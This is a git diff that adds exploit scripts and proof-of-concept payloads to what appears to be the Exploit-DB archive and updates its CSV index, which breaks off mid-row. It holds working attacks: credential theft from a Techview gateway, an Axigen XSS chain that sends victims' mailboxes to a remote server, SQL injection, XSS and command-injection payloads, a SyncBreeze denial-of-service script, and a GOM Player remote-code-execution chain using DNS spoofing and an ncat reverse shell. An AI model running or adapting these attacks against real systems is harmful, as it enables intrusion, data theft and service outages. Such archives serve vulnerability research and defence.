diff --git a/exploits/hardware/remote/51720.py b/exploits/hardware/remote/51720.py new file mode 100755 index 000000000..ee4a2e6d9 --- /dev/null +++ b/exploits/hardware/remote/51720.py @@ -0,0 +1,77 @@ +# Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities +# Google Dork: N/A +# Date: 25/08/2023 +# Exploit Author: The Security Team [exploitsecurity.io] +# Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570 +# Software Link: N/A +# Version: 1.0.19_T53 +# Tested on: MACOS/Linux +# CVE : CVE-2023-34723 +# POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725 + +#!/opt/homebrew/bin/python3 + +import requests +import sys +from time import sleep +from urllib3.exceptions import InsecureRequestWarning +from colorama import init +from colorama import Fore, Back, Style +import re +import os +import ipaddress +requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) + +def banner(): + if os.name == 'posix': + clr_cmd = ('clear') + elif os.name == 'nt': + clr_cmd = ('cls') + os.system(clr_cmd) + print ("[+]****************************************************[+]") + print (" | Author : The Security Team |") + print (" | Company : "+Fore.RED+ "Exploit Security" +Style.RESET_ALL+"\t\t\t|") + print (" | Description : TechVIEW LA-5570 Directory Traversal |") + print (" | Usage : "+sys.argv[0]+" |") + print ("[+]****************************************************[+]") + +def usage(): + print (f"Usage: {sys.argv[0]} ") + +def main(target): + domain = "http://"+target+"/config/system.conf" + try: + url = domain.strip() + r = requests.get(url, verify=False, timeout=3) + print ("[+] Retrieving credentials", flush=True, end='') + sleep(1) + print(" .", flush=True, end='') + sleep(1) + print(" .", flush=True, end='') + sleep(1) + print(" .", flush=True, end='') + if ("system_password" in r.text): + data = (r.text.split("\n")) + print (f"\n{data[1]}") + else: + print (Fore.RED + "[!] Target is not vulnerable !"+ Style.RESET_ALL) + except TimeoutError: + print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL) + except KeyboardInterrupt: + return + except requests.exceptions.Timeout: + print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL) + return + +if __name__ == '__main__': + if len(sys.argv)>1: + banner() + target = sys.argv[1] + try: + validate = ipaddress.ip_address(target) + if (validate): + main (target) + except ValueError as e: + print (Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL) + else: + print (Fore.RED + f"[+] Not enough arguments, please specify target !" + Style.RESET_ALL) \ No newline at end of file diff --git a/exploits/multiple/webapps/51722.txt b/exploits/multiple/webapps/51722.txt new file mode 100644 index 000000000..4fe0cbfa8 --- /dev/null +++ b/exploits/multiple/webapps/51722.txt @@ -0,0 +1,80 @@ +# Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS +# Google Dork: inurl:passwordexpired=yes +# Date: 2023-08-21 +# Exploit Author: AmirZargham +# Vendor Homepage: https://www.axigen.com/ +# Software Link: https://www.axigen.com/mail-server/download/ +# Version: (10.5.0–4370c946) and older version of Axigen WebMail +# Tested on: firefox,chrome +# CVE: CVE-2022-31470 + +Exploit +We use the second Reflected XSS to exploit this vulnerability, create a +malicious link, and steal user emails. + +Dropper code +This dropper code, loads and executes JavaScript exploit code from a remote +server. + +'); +x = document.createElement('script'); +x.src = 'https://example.com/exploit.js'; +window.addEventListener('DOMContentLoaded',function y(){ + document.body.appendChild(x) +})// + + + +Encoded form + +/index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27 +https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})// + + +Exploit code + +xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new +XMLHttpRequest(); +oob_server = 'https://example.com/'; +var script_tag = document.createElement('script'); + +xhr1.open('GET', '/', true); +xhr1.onreadystatechange = () => { + if (xhr1.readyState === XMLHttpRequest.DONE) { + _h_cookie = new URL(xhr1.responseURL).search.split("=")[1]; + xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`, +true); + xhr2.setRequestHeader('Content-Type', 'application/json'); + xhr2.onreadystatechange = () => { + if (xhr2.readyState === XMLHttpRequest.DONE) { + if (xhr2.status === 401){ + script_tag.src = +`${oob_server}?status=session_expired&domain=${document.domain}`; + document.body.appendChild(script_tag); + } else { + resp = xhr2.responseText; + folderId = JSON.parse(resp)["mails"][0]["folderId"]; + xhr3.open('GET', +`/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true); + xhr3.onreadystatechange = () => { + if (xhr3.readyState === XMLHttpRequest.DONE) { + emails = xhr3.responseText; + script_tag.src = +`${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`; + document.body.appendChild(script_tag); + } + }; + xhr3.send(); + } + } + }; + var body = JSON.stringify({isUnread: false}); + xhr2.send(body); + } +}; +xhr1.send(); + + +Combining dropper and exploit +You can host the exploit code somewhere and then address it in the dropper +code. \ No newline at end of file diff --git a/exploits/php/webapps/51714.txt b/exploits/php/webapps/51714.txt new file mode 100644 index 000000000..0d790e9a4 --- /dev/null +++ b/exploits/php/webapps/51714.txt @@ -0,0 +1,41 @@ +# Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection +# Exploit Author: CraCkEr +# Date: 20/08/2023 +# Vendor: SPA-Cart +# Vendor Homepage: https://spa-cart.com/ +# Software Link: https://demo.spa-cart.com/ +# Version: 1.9.0.3 +# Tested on: Windows 10 Pro +# Impact: Database Access +# CVE: CVE-2023-4548 +# CWE: CWE-89 / CWE-74 / CWE-707 + + +## Greetings + +The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka +CryptoJob (Twitter) twitter.com/0x0CryptoJob + + +## Description + +SQL injection attacks can allow unauthorized access to sensitive data, modification of +data and crash the application or make it unavailable, leading to lost revenue and +damage to a company's reputation. + + +Path: /search + +GET parameter 'filter[brandid]' is vulnerable to SQL Injection + +https://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[SQLi]&filter[price]=100-500&filter[attr][Memory][]=500%20GB&filter[attr][Color][]=Black + +--- +Parameter: filter[brandid] (GET) + Type: time-based blind + Title: MySQL >= 5.0.12 time-based blind (query SLEEP) + Payload: filtered=1&q=11&load_filter=1&filter[brandid]=4'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z&filter[price]=100-500&filter[attr][Memory][]=500 GB&filter[attr][Color][]=Black +--- + + +[-] Done \ No newline at end of file diff --git a/exploits/php/webapps/51715.txt b/exploits/php/webapps/51715.txt new file mode 100644 index 000000000..2bf7fd726 --- /dev/null +++ b/exploits/php/webapps/51715.txt @@ -0,0 +1,108 @@ +## Title: Jorani v1.0.3-(c)2014-2023 - XSS Reflected & Information Disclosure +## Author: nu11secur1ty +## Date: 08/27/2023 +## Vendor: https://jorani.org/ +## Software: https://demo.jorani.org/session/login +## Reference: https://portswigger.net/web-security/cross-site-scripting +## Reference: https://portswigger.net/web-security/information-disclosure + +## Description: +The value of the `language request` parameter is copied into a +JavaScript string which is encapsulated in double quotation marks. The +payload 75943";alert(1)//569 was submitted in the language parameter. +This input was echoed unmodified in the application's response. +The attacker can modify the token session and he can discover +sensitive information for the server. + +STATUS: HIGH-Vulnerability + +[+]Exploit: +```POST +POST /session/login HTTP/1.1 +Host: demo.jorani.org +Accept-Encoding: gzip, deflate +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 +Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2; +jorani_session=fbc630d2510ffdd2a981ccfe97301b1b90ab47dc#ATTACK +Origin: http://demo.jorani.org +Upgrade-Insecure-Requests: 1 +Referer: http://demo.jorani.org/session/login +Content-Type: application/x-www-form-urlencoded +Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116" +Sec-CH-UA-Platform: Windows +Sec-CH-UA-Mobile: ?0 +Content-Length: 183 + +csrf_test_jorani=9b4b02ece59e0f321cd0324a633b5dd2&last_page=session%2Flogin&language=en-GBarh5l%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ennois&login=bbalet&CipheredValue= + +``` + +[+]Response: +```HTTP +HTTP/1.1 200 OK +date: Sun, 27 Aug 2023 06:03:04 GMT +content-type: text/html; charset=UTF-8 +Content-Length: 681 +server: Apache +x-powered-by: PHP/8.2 +expires: Thu, 19 Nov 1981 08:52:00 GMT +cache-control: no-store, no-cache, must-revalidate +pragma: no-cache +set-cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2; +expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; +SameSite=Strict +set-cookie: jorani_session=9ae823ffa74d722c809f6bda69954593483f2cfd; +expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; HttpOnly; +SameSite=Lax +last-modified: Sun, 27 Aug 2023 06:03:04 GMT +vary: Accept-Encoding +cache-control: private, no-cache, no-store, proxy-revalidate, +no-transform, must-revalidate +pragma: no-cache +x-iplb-request-id: 3E497A1D:118A_D5BA2118:0050_64EAE718_12C0:1FBA1 +x-iplb-instance: 27474 +connection: close + + +
+ +

A PHP Error was encountered

+ +

Severity: 8192

+

Message: strlen(): Passing null to parameter #1 ($string) of type +string is deprecated

+

Filename: controllers/Connection.php

+

Line Number: 126

+ + +
+
+ +

A PHP Error was encountered

+ +

Severity: Warning

+

Message: Cannot modify header information - headers already sent +by (output started at +/home/decouvric/demo.jorani.org/system/core/Exceptions.php:272)

+

Filename: helpers/url_helper.php

+

Line Number: 565

+ + +
+``` + + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Jorani/2023/Jorani-v1.0.3-%C2%A92014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure) + +## Proof and Exploit: +[href](https://www.nu11secur1ty.com/2023/08/jorani-v103-2014-2023-benjamin-balet.html) + +## Time spend: +01:35:00 \ No newline at end of file diff --git a/exploits/php/webapps/51716.txt b/exploits/php/webapps/51716.txt new file mode 100644 index 000000000..ab15b1255 --- /dev/null +++ b/exploits/php/webapps/51716.txt @@ -0,0 +1,15 @@ +# Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection +# Date: 28.08.2023 +# Exploit Author: Miguel Santareno +# Vendor Homepage: https://elementor.com/ +# Version: < 3.5.5 +# Tested on: Google and Firefox latest version +# CVE : CVE-2022-4953 + +# 1. Description +The plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs. + + +# 2. Proof of Concept (PoC) +Proof of Concept: +https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K \ No newline at end of file diff --git a/exploits/php/webapps/51717.py b/exploits/php/webapps/51717.py new file mode 100755 index 000000000..88839f9d9 --- /dev/null +++ b/exploits/php/webapps/51717.py @@ -0,0 +1,38 @@ +# Exploit Title: Wp2Fac v1.0 - OS Command Injection +# Date: 2023-08-27 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor: https://github.com/metinyesil/wp2fac +# Tested on: Kali Linux & Windows 11 +# CVE: N/A + +import requests + +def send_post_request(host, revshell): + url = f'http://{host}/send.php' + headers = { + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) +Gecko/20100101 Firefox/102.0', + 'Accept': '*/*', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', + 'X-Requested-With': 'XMLHttpRequest', + 'Origin': f'http://{host}', + 'Connection': 'close', + 'Referer': f'http://{host}/', + } + + data = { + 'numara': f'1234567890 & {revshell} &;' + } + + response = requests.post(url, headers=headers, data=data) + return response.text + +host = input("Target IP: ") + +revshell = input("Reverse Shell Command: ") + +print("Check your listener!") + +send_post_request(host, revshell) \ No newline at end of file diff --git a/exploits/php/webapps/51718.txt b/exploits/php/webapps/51718.txt new file mode 100644 index 000000000..cb13e44eb --- /dev/null +++ b/exploits/php/webapps/51718.txt @@ -0,0 +1,42 @@ +## Title: soosyze 2.0.0 - File Upload +## Author: nu11secur1ty +## Date: 04.26.2023-08.28.2023 +## Vendor: https://soosyze.com/ +## Software: https://github.com/soosyze/soosyze/releases/tag/2.0.0 +## Reference: https://portswigger.net/web-security/file-upload + +## Description: +Broken file upload logic. The malicious user can upload whatever he +wants to an HTML file and when he tries to execute it he views almost +all +file paths. This could be worse than ever, it depends on the scenario. + +STATUS: HIGH Vulnerability + +[+]Exploit: +```HTML + + + +Hello broken file upload logic, now I can read your special +directory pats, thank you ;) + + +

+ +

+ + + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/soosyze/2023/soosyze-2.0.0) + +## Proof and Exploit: +[href](https://www.nu11secur1ty.com/2023/05/soosyze-200-file-path-traversal-broken.html) + +## Time spend: +01:27:00 \ No newline at end of file diff --git a/exploits/php/webapps/51723.txt b/exploits/php/webapps/51723.txt new file mode 100644 index 000000000..f5e7dc3df --- /dev/null +++ b/exploits/php/webapps/51723.txt @@ -0,0 +1,88 @@ +## Title: drupal-10.1.2 web-cache-poisoning-External-service-interaction +## Author: nu11secur1ty +## Date: 08/30/2023 +## Vendor: https://www.drupal.org/ +## Software: https://www.drupal.org/download +## Reference: https://portswigger.net/kb/issues/00300210_external-service-interaction-http + +## Description: +It is possible to induce the application to perform server-side HTTP +requests to arbitrary domains. +The payload d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com was +submitted in the HTTP Host header. +The application performed an HTTP request to the specified domain. For +the second test, the attacker stored a response +on the server with malicious content. This can be bad for a lot of +users of this system if the attacker spreads a malicious URL +and sends it by email etc. By using a redirect exploit. + +STATUS: HIGH-Vulnerability + +[+]Exploit: +```GET +GET /drupal/web/?psp4hw87ev=1 HTTP/1.1 +Host: d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com +Accept-Encoding: gzip, deflate, psp4hw87ev +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, +text/psp4hw87ev +Accept-Language: en-US,psp4hw87ev;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 +Safari/537.36 psp4hw87ev +Connection: close +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116" +Sec-CH-UA-Platform: Windows +Sec-CH-UA-Mobile: ?0 +Origin: https://psp4hw87ev.pwnedhost.com +``` +[+]Response from Burpcollaborator server: +```HTTP +HTTP/1.1 200 OK +Server: Burp Collaborator https://burpcollaborator.net/ +X-Collaborator-Version: 4 +Content-Type: text/html +Content-Length: 62 + +zeq5zcbz3x69x9a63ubxidzjlgigmmgifigz +``` + +[+]Response from Attacker server +```HTTP +192.168.100.45 - - [30/Aug/2023 05:52:56] "GET +/drupal/web/rss.xml?psp4hw87ev=1 HTTP/1.1" +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/DRUPAL/2013/drupal-10.1.2) + +## Proof and Exploit: +[href](https://www.nu11secur1ty.com/2023/08/drupal-1012-web-cache-poisoning.html) + +## Time spend: +03:35:00 + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and +https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/python/webapps/51676.py b/exploits/python/webapps/51676.py index 95d1d9d5d..bf0a17b8b 100755 --- a/exploits/python/webapps/51676.py +++ b/exploits/python/webapps/51676.py @@ -2,8 +2,6 @@ # Exploit Author: Iyaad Luqman K (init_6) # Application: Maltrail v0.53 # Tested on: Ubuntu 22.04 -# CVE: CVE-2023-27163 - # PoC import sys; diff --git a/exploits/windows/dos/51725.py b/exploits/windows/dos/51725.py new file mode 100755 index 000000000..9ee606111 --- /dev/null +++ b/exploits/windows/dos/51725.py @@ -0,0 +1,35 @@ +# Exploit Title: SyncBreeze 15.2.24 -'login' Denial of Service +# Date: 30/08/2023 +# Exploit Author: mohamed youssef +# Vendor Homepage: https://www.syncbreeze.com/ +# Software Link: https://www.syncbreeze.com/setups/syncbreeze_setup_v15.4.32.exe +# Version: 15.2.24 +# Tested on: windows 10 64-bit +import socket +import time + + +pyload="username=admin&password="+'password='*500+"" +request="" +request+="POST /login HTTP/1.1\r\n" +request+="Host: 192.168.217.135\r\n" +request+="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\r\n" +request+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n" +request+="Accept-Language: en-US,en;q=0.5\r\n" +request+="Accept-Encoding: gzip, deflate\r\n" +request+="Content-Type: application/x-www-form-urlencoded\r\n" +request+="Content-Length: "+str(len(pyload))+"\r\n" +request+="Origin: http://192.168.217.135\r\n" +request+="Connection: keep-alive\r\n" +request+="Referer: http://192.168.217.135/login\r\n" +request+="Upgrade-Insecure-Requests: 1\r\n" +request+="\r\n" +request+=pyload + +print (request) +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +s.connect(("192.168.217.135",80)) +s.send(request.encode()) +print (s.recv(1024)) +s.close() +time.sleep(5) \ No newline at end of file diff --git a/exploits/windows/local/51724.py b/exploits/windows/local/51724.py new file mode 100755 index 000000000..129806787 --- /dev/null +++ b/exploits/windows/local/51724.py @@ -0,0 +1,29 @@ +# Exploit Title: GOM Player 2.3.90.5360 - Buffer Overflow (PoC) +# Discovered by: Ahmet Ümit BAYRAM +# Discovered Date: 30.08.2023 +# Vendor Homepage: https://www.gomlab.com +# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE +# Tested Version: 2.3.90.5360 (latest) +# Tested on: Windows 11 64bit +# Thanks to: M. Akil GÜNDOĞAN + +# - Open GOM Player +# - Click on the gear icon above to open settings +# - From the menu that appears, select Audio +# - Click on Equalizer +# - Click on the plus sign to go to the "Add EQ preset" screen +# - Copy the contents of exploit.txt and paste it into the preset name box, then click OK +# - Crashed! + +#!/usr/bin/python + +exploit = 'A' * 260 + +try: + file = open("exploit.txt","w") + file.write(exploit) + file.close() + + print("POC is created") +except: + print("POC is not created") \ No newline at end of file diff --git a/exploits/windows/remote/51719.py b/exploits/windows/remote/51719.py new file mode 100755 index 000000000..865929244 --- /dev/null +++ b/exploits/windows/remote/51719.py @@ -0,0 +1,119 @@ +# Exploit Title: GOM Player 2.3.90.5360 - Remote Code Execution (RCE) +# Date: 26.08.2023 +# Author: M. Akil Gündoğan +# Contact: https://twitter.com/akilgundogan +# Vendor Homepage: https://www.gomlab.com/gomplayer-media-player/ +# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE +# Version: 2.3.90.5360 +# Tested on: Windows 10 Pro x64 22H2 19045.3324 +# PoC Video: https://www.youtube.com/watch?v=8d0YUpdPzp8 + +# Impacts: GOM player has been downloaded 63,952,102 times according to CNET. It is used by millions of people worldwide. + +# Vulnerability Description: +# The IE component in the GOM Player's interface uses an insecure HTTP connection. Since IE is vulnerable to the +# SMB/WebDAV+ "search-ms" technique, we can redirect the victim to the page we created with DNS spoofing and execute code on the target. +# In addition, the URL+ZIP+VBS MoTW bypass technique was used to prevent the victim from seeing any warning in the pop-up window. + +# Full disclosure, developers should be more careful about software security. + +# Exploit Usage: Run it and enter the IP address of the target. Then specify the port to listen to for the reverse shell. + +# Some spaghetti and a bad code but it works :) + +banner = """\033[38;5;196m+-----------------------------------------------------------+ +| GOM Player 2.3.90.5360 - Remote Code Execution | +| Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-) | ++-----------------------------------------------------------+\033[0m""" +""" +\033[38;5;117m[*]- Author: M. Akil Gundogan - rootkit.com.tr\n\033[0m""" + +import time,os,zipfile,subprocess,socket,sys + +print(banner) + +if os.geteuid() != 0: + print("You need root privileges to run the exploit, please use sudo...") + sys.exit(1) + +targetIP = input("- Target IP address: ") +listenPort = input("- Listening port for Reverse Shell: ") + +def fCreate(fileName,fileContent): # File create func. + f = open(fileName,"w") + f.write(fileContent) + f.close() + +gw = os.popen("ip -4 route show default").read().split() +s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +s.connect((gw[2], 0)) +ipaddr = s.getsockname()[0] +gateway = gw[2] +host = socket.gethostname() +print ("- My IP:", ipaddr, " Gateway:", gateway, " Host:", host) + +print("\n[*]- Stage 1: Downloading neccesary tools...") + +smbFolderName = "GomUpdater" # change this (optional) +expWorkDir = "gomExploitDir" # change this (optional) +os.system("mkdir " + expWorkDir +" >/dev/null 2>&1 &") # Creating a working directory for the exploit. +time.sleep(1) # It's necessary for exploit stability. +os.system("cd " + expWorkDir + "&& mkdir smb-shared web-shared >/dev/null 2>&1 &") # Creating a working directory for the exploit. +time.sleep(1) # It's necessary for exploit stability. +os.system("cd " + expWorkDir + "/smb-shared && wget https://nmap.org/dist/ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && unzip -o -j ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && rm -rf ncat-portable-5.59BETA1.zip README") #Downloading ncat +print(" [*] - Ncat has been downloaded.") +subprocess.run("git clone https://github.com/fortra/impacket.git " + expWorkDir + "/impacket >/dev/null 2>&1",shell=True) # Downloading Impacket +print(" [*] - Impacket has been downloaded.") +subprocess.run("git clone https://github.com/dtrecherel/DNSSpoof.git " + expWorkDir + "/dnsspoof >/dev/null 2>&1",shell=True) # Downloading DNSSpoof.py +print(" [*] - DNSSpoof.py has been downloaded.") + +print("[*]- Stage 2: Creating Attacker SMB Server...") +subprocess.Popen("cd gomExploitDir/impacket/examples && python3 smbserver.py "+smbFolderName+" ../../smb-shared -smb2support >/dev/null 2>&1",shell=True) # Running SMB server. +time.sleep(5) # It's necessary for exploit stability. + +smbIP = ipaddr +spoofUrl = "playinfo.gomlab.com" # Web page that causes vulnerability because it is used as HTTP + +print("[*]- Stage 3: Creating Attacker Web Page...") + +# change this (optional) +screenExpPage = """ + + + +""" + +fCreate(expWorkDir + "/web-shared/screen.html",screenExpPage) +time.sleep(3) # It's necessary for exploit stability. + +print("[*]- Stage 4: Creating URL+VBS for MoTW bypass placing it into the ZIP archive...") +vbsCommand = '''Set shell=CreateObject("wscript.shell") +Shell.Run("xcopy /y \\\\yogurt\\ayran\\ncat.exe %temp%") +WScript.Sleep 5000 +Shell.Run("cmd /c start /min cmd /c %temp%\\ncat.exe attackerIP attackerPort -e cmd")''' # change this (optional) +vbsCommand = vbsCommand.replace("yogurt", smbIP).replace("ayran", smbFolderName).replace("attackerIP",smbIP).replace("attackerPort",listenPort) +fCreate(expWorkDir + "/payload.vbs",vbsCommand) + +urlShortcut = '''[InternetShortcut] +URL=file://'''+smbIP+"/"+smbFolderName+'''/archive.zip/payload.vbs +IDlist=''' +fCreate(expWorkDir + "/smb-shared/Updater.url",urlShortcut) +time.sleep(3) # It's necessary for exploit stability. +zipName = expWorkDir + "/smb-shared/archive.zip" +payload_filename = os.path.join(expWorkDir, "payload.vbs") + +with zipfile.ZipFile(zipName, "w") as malzip: + malzip.write(payload_filename, arcname=os.path.basename(payload_filename)) + +print("[*]- Stage 5: Running the attacker's web server...") +subprocess.Popen("cd " + expWorkDir + "/web-shared && python3 -m http.server 80 >/dev/null 2>&1",shell=True) # Running attacker web server with Python mini http.server +time.sleep(3) # It's necessary for exploit stability. + +print("[*]- Stage 6: Performing DNS and ARP spoofing for the target...") +subprocess.Popen("python3 " + expWorkDir + "/dnsspoof/dnsspoof.py -d " + spoofUrl + " -t " + targetIP + ">/dev/null 2>&1",shell=True) # DNS Spoofing... +time.sleep(10) # It's neccesary for exploit stability. +os.system("ping -c 5 " + targetIP + " >/dev/null 2>&1 &") # Ping the target... +os.system("arping -c 5 " + targetIP + " >/dev/null 2>&1 &") # ARPing the target. +print("[*]- Stage 7: Waiting for the target to open GOM Player and execute the malicious URL shortcut...\n") +subprocess.run("nc -lvnp " + listenPort,shell=True) +subprocess.run("pkill -f smbserver.py & pkill -f http.server & pkill -f dnsspoof.py",shell=True) # Closing background processes after exploitation... \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b5a776c7b..df321cd7d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -3924,6 +3924,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 44577,exploits/hardware/remote/44577.py,"TBK DVR4104 / DVR4216 - Credentials Leak",2018-05-02,ezelf,remote,hardware,,2018-05-03,2018-05-03,0,CVE-2018-9995,,,,,https://github.com/ezelf/CVE-2018-9995_dvr_credentials/blob/529a711e3db8c7265473bf122276fb295e5b973d/getDVR_Credentials.py 43384,exploits/hardware/remote/43384.py,"Technicolor DPC3928SL - SNMP Authentication Bypass",2017-05-05,nixawk,remote,hardware,,2017-12-21,2017-12-21,0,CVE-2017-5135,,Stringbleed,,,https://github.com/nixawk/labs/blob/47d72af5b69bd4d2ec411b38313d33111a063c97/CVE-2017-5135/StringBleed-CVE-2017-5135.py 35620,exploits/hardware/remote/35620.txt,"Technicolor THOMSON TG585v7 Wireless Router - 'url' Cross-Site Scripting",2011-04-15,"Edgard Chammas",remote,hardware,,2011-04-15,2014-12-26,1,,,,,,https://www.securityfocus.com/bid/47390/info +51720,exploits/hardware/remote/51720.py,"Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities",2023-09-08,"The Security Team [exploitsecurity.io]",remote,hardware,,2023-09-08,2023-09-08,0,CVE-2023-34723,,,,, 20806,exploits/hardware/remote/20806.txt,"Tektronix Phaser 740/750/850/930 - Network Printer Administration Interface",2001-04-25,Ltlw0lf,remote,hardware,,2001-04-25,2012-08-25,1,CVE-2001-0484;OSVDB-551,,,,,https://www.securityfocus.com/bid/2659/info 19632,exploits/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink WebServer - Retrieve Administrator Password",1999-11-17,"Dennis W. Mattison",remote,hardware,,1999-11-17,2012-07-06,1,CVE-1999-1508;OSVDB-113,,,,,https://www.securityfocus.com/bid/806/info 6750,exploits/hardware/remote/6750.txt,"Telecom Italia Alice Pirelli routers - Backdoor from internal LAN/WAN",2008-10-14,"saxdax & drpepperONE",remote,hardware,,2008-10-13,,1,OSVDB-49193,,,,, @@ -11639,6 +11640,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 18117,exploits/multiple/webapps/18117.txt,"Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Blind SQL Injection",2011-11-15,"Jose Carlos de Arriba",webapps,multiple,,2011-11-19,2017-11-06,0,CVE-2011-4801;OSVDB-75656,,,,, 50955,exploits/multiple/webapps/50955.txt,"Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS)",2022-06-14,"Andrea Intilangelo",webapps,multiple,,2022-06-14,2022-06-14,0,CVE-2022-29296,,,,, 48581,exploits/multiple/webapps/48581.txt,"Avaya IP Office 11 - Password Disclosure",2020-06-12,hyp3rlinx,webapps,multiple,,2020-06-12,2020-06-12,0,CVE-2020-7030,,,,, +51722,exploits/multiple/webapps/51722.txt,"Axigen < 10.3.3.47_ 10.2.3.12 - Reflected XSS",2023-09-08,AmirZargham,webapps,multiple,,2023-09-08,2023-09-08,0,CVE-2022-31470,,,,, 31673,exploits/multiple/webapps/31673.txt,"Azureus HTML WebUI 0.7.6 - Cross-Site Request Forgery",2008-04-18,th3.r00k,webapps,multiple,,2008-04-18,2014-02-16,1,,,,,,https://www.securityfocus.com/bid/28848/info 35233,exploits/multiple/webapps/35233.txt,"B-Cumulus - 'tagcloud' Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,webapps,multiple,,2011-01-18,2014-11-13,1,,,,,,https://www.securityfocus.com/bid/45911/info 48834,exploits/multiple/webapps/48834.txt,"B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure",2020-09-25,LiquidWorm,webapps,multiple,,2020-09-25,2020-09-25,0,,,,,, @@ -17234,6 +17236,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 10575,exploits/php/webapps/10575.txt,"Drumbeat CMS 1.0 - SQL Injection",2009-12-21,Sora,webapps,php,,2009-12-20,,0,,,,,, 9635,exploits/php/webapps/9635.txt,"Drunken:Golem Gaming Portal - 'admin_news_bot.php' Remote File 